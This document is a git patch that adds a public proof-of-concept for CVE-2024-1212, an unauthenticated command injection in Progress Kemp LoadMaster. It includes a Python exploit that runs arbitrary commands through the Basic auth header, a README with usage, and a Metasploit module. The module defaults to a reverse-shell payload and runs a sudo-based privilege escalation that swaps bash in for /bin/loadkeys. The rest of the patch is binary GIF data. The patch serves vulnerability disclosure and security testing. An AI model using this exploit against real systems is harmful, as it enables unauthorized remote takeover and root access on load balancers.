From 5a8a723e3023abe600b681ed37073ac38b64b384 Mon Sep 17 00:00:00 2001 From: DaveYesland Date: Tue, 19 Mar 2024 07:04:12 -0700 Subject: [PATCH] add CVE-2024-1212 --- CVE-2024-1212/CVE-2024-1212.py | 33 +++++ CVE-2024-1212/README.md | 20 +++ ...ss_kemp_loadmaster_unauth_cmd_injection.rb | 137 ++++++++++++++++++ CVE-2024-1212/poc_image.gif | Bin 0 -> 30491 bytes 4 files changed, 190 insertions(+) create mode 100644 CVE-2024-1212/CVE-2024-1212.py create mode 100644 CVE-2024-1212/README.md create mode 100644 CVE-2024-1212/metasploit/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb create mode 100644 CVE-2024-1212/poc_image.gif diff --git a/CVE-2024-1212/CVE-2024-1212.py b/CVE-2024-1212/CVE-2024-1212.py new file mode 100644 index 0000000..c8aecd6 --- /dev/null +++ b/CVE-2024-1212/CVE-2024-1212.py @@ -0,0 +1,33 @@ +# Exploit for CVE-2024-1212: Unauthenticated RCE in Progress Kemp LoadMaster +# Tested on: LoadMaster 7.2.59.0.22007 +# Author: Dave Yesland @daveysec with Rhino Security Labs + +import requests +from requests.auth import HTTPBasicAuth +import argparse + +requests.packages.urllib3.disable_warnings() + +argparser = argparse.ArgumentParser(description="Exploit for CVE-2024-1212: Unauthenticated RCE in Progress Kemp LoadMaster") +argparser.add_argument('target', help='The target (https://LoadmasterIP)') +argparser.add_argument('command', help='The command to run') +args = argparser.parse_args() + +target = args.target +command = args.command + +normal_headers = ["Date", "Connection", "Content-Type", "Transfer-Encoding"] + +# Fix colons as it will break the basic auth +command = command.replace(":", "$'\\x3a'") + +url = f"{target}/access/set?param=enableapi&value=1" +r = requests.get(url, auth=HTTPBasicAuth(f"';{command};echo '", "anything"), verify=False) +for key, value in r.headers.items(): + if key not in normal_headers: + print(f"{key}: {value}") +for line in r.text.splitlines(): + if line == ' -p anything': + break + else: + print(line) diff --git a/CVE-2024-1212/README.md b/CVE-2024-1212/README.md new file mode 100644 index 0000000..a86a847 --- /dev/null +++ b/CVE-2024-1212/README.md @@ -0,0 +1,20 @@ +# CVE-2024-1212: Unauthenticated RCE in Progress Kemp LoadMaster + +## Information +**Description:** This allows remote code execution in the Progress Kemp LoadMaster via the admin web service. +**Versions Affected:** All LoadMaster releases after 7.2.48.1 +**Version Fixed:** 7.2.59.2 (GA), 7.2.54.8 (LTSF), 7.2.48.10 (LTS) +**Researcher:** Dave Yesland +**Disclosure Link:** PLACEHOLDER +**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-1212 +**Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 + +## Proof-of-Concept Exploit +### Description +The exploit bypasses API restrictions and executes commands through a command injection in the basic authorization header. + +### Usage/Exploitation +`python3 CVE-2024-1212.py https://LM_host 'ls'` + +### Screenshot +![Alt-text that shows up on hover](poc_image.gif) diff --git a/CVE-2024-1212/metasploit/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb b/CVE-2024-1212/metasploit/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb new file mode 100644 index 0000000..1aae708 --- /dev/null +++ b/CVE-2024-1212/metasploit/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb @@ -0,0 +1,137 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Kemp LoadMaster Unauthenticated Command Injection', + 'Description' => %q{ + This module exploits an unauthenticated command injection vulnerability in + Progress Kemp LoadMaster, versions before 7.2.59.2. + }, + 'Author' => [ + 'Dave Yesland with Rhino Security Labs', + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2024-1212'], + ['URL', 'https://kemptechnologies.com/kemp-load-balancers'], + ['URL', 'https://www.rhinosecuritylabs.com/'] + ], + 'DisclosureDate' => '2024', + 'Notes' => { + 'Stability' => [ CRASH_SAFE ], + 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'Reliability' => [ REPEATABLE_SESSION ] + }, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Automatic', {}]], + 'Privileged' => false, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp', + 'SSL' => true, + 'RPORT' => 443 + }, + 'Payload' => + { + 'BadChars' => "\x3a\x27" + } + ) + ) + + register_options([ + OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/']), + OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true]) + ]) + + @first_session_timestamp = nil + end + + def exploit + uri = normalize_uri(target_uri.path, 'access', 'set') + + print_status("Sending payload...") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => + { + 'param' => 'enableapi', + 'value' => "1" + }, + 'authorization' => basic_auth("';#{payload.encoded};echo '", 'anything'), + 'verify' => false + }) + end + + def on_new_session(session) + # Kill the session if it was initiated too close to the first session + # This command injection tends to execute twice, so we want to kill + # the second session. Probably a better way to do this but I don't know it. + super + current_time = Time.now.to_i + if @first_session_timestamp.nil? + @first_session_timestamp = current_time + elsif current_time - @first_session_timestamp < 5 + print_error("Detected a session initiated too close to the first session. Terminating it.") + session.kill + end + + # Run privesc commands if PRIVESC is set to true + if datastore['PRIVESC'] + execute_privesc_command(session) + else + print_status('Privilege escalation skipped.') + end + end + + def execute_privesc_command(session) + print_status("Executing privilege escalation command...") + session.shell_command('sudo /bin/cp /bin/loadkeys /tmp/loadkeys') + session.shell_command('sudo /bin/cp /bin/bash /bin/loadkeys') + session.shell_command('sudo /bin/loadkeys -c /bin/bash') + session.shell_command('cp /tmp/loadkeys /bin/loadkeys') + end + + def check + print_status("Checking if #{peer} is vulnerable...") + + uri = normalize_uri(target_uri.path, 'access', 'set') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'param' => 'enableapi', + 'value' => "1" + }, + 'authorization' => basic_auth("'", 'anything'), + 'verify' => false + }) + + # No response from server + unless res + return CheckCode::Unknown + end + + # Check for specific error pattern in headers or body to confirm vulnerability + if res.headers.to_s.include?("unexpected EOF while looking for matching") || res.body.include?("unexpected EOF while looking for matching") + return CheckCode::Vulnerable + else + return CheckCode::Safe + end + end + + end \ No newline at end of file diff --git a/CVE-2024-1212/poc_image.gif b/CVE-2024-1212/poc_image.gif new file mode 100644 index 0000000000000000000000000000000000000000..068d81e80d7b0e498880cedfe68868866a9e6762 GIT binary patch literal 30491 zcmeHwby(Kvwl>}I(ka~_-5}j9AdQ4{DP2l;cXxMpcZwpQgeWPE3I-{BKX@HBduI0R z+54P*&i7s4tZNOvzIa{p*Lv1^?sebyBP}b%%V*>aMFi;v0YQF=tR$(fCN8QX$nc{0DLM&x%p50~r|^{NWFNqFx6Y8X7t}ItB&?=D!kHzX=>19DICy zLPA1fVqy{!5>ir9GBPp>3JOX}N@{9qdV2c1cki;Wu&}YQv9q&tUI!N!7Y`2)FE1}2 zAD@7LfS{nDkdTmwh=`b&nD})_NJvOYNl8mf%gV|sC@3f^E32re+`oTcRaI5(??e4o zJb3UxLqkJbTU$?0@8QFT1_lO(x5DUF7#kZudi2P|#Khd(+{((z`Z{cEY;0|9?dD$jIpE z=-AlUxVX6Z>qtmQNK8yjN=iyeNl8sjO-oBlPfyRt$jHph%*x8j&d$!s$;r*l&CAQn zzm9_6L}6iJQBhHGadByBX?b~hMMXtrWo1=WRdscBO-)U0ZEam$U44ChLqkJjV`I~; zX#OQyT3T9LTie^)J32bLy1Kf%yL)xeE9HTXJ_Zrr%&I$eLFchIXyi+J3Bi+KmYOL z$Hm3P<>e*91q3<*u}n=)uRj77gWgC@ZhtU{QZ7TLHg7N-pTlZ#q&9yznoKW;|k;#vZ1l<-v~Q=4&TC#;CeS#{Fn9jYj{JZTL0g5Jh@S zs(4Wed7|RR^KXZaBC)N-@Fgi&;ykscT}Y6$A0^#$NP9Ejtuz+3bFwSrni&RiOOpA9 z@-X5_Mi#hieDlSNE3BV<5?!JlOi@!*Y1vt*M(j$VN_nz3QHVv+t*DDpF$|T=Q{1({ z{~dY({=$*vEx-HTM&LdFsH!I{_F+BRL&6q%WS_#n92oCMJ~HuY^U|NeAyQW`Mk7K- zgb&AurSKQWh(}#dc@}0V7=pA(|J|>t^c#sS zxgjK7_-l|fQ!Tnaus>XVqDfMr#zn=-;3=Jp$i$Z))_j=D4Id%a28C>-tOBKQ*YZUe z@_kF{BzVcCLROAt`ur=dB2Na2fT zgc5)w9G>2UWejpHjyj2P4+$E zL+mr#AIlY`)ChBXtcl0*HHALfzGI!%w`eL~N*~pTG;dyCI?Glc%J!zF9b~>4+_0F1 zlpi-@*rJjRSL=&!R0I{Cl(KxdTUKUiX-bA8;%Onr5|5q29-`4!v@ogBS8^B4=BvZD zXq=_MBvt3r@ej{Hr7|p!sBl9otFY=2Sj9Fe*1w5Zk~X-Ai9hypG~!3+#9Ndgip;rq z*$?}y?3IWb`PT_g^4*VtT;=YdH{s^`DsPYaLaM8fMZH7}S&r|

h5e_%){C2DENO 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 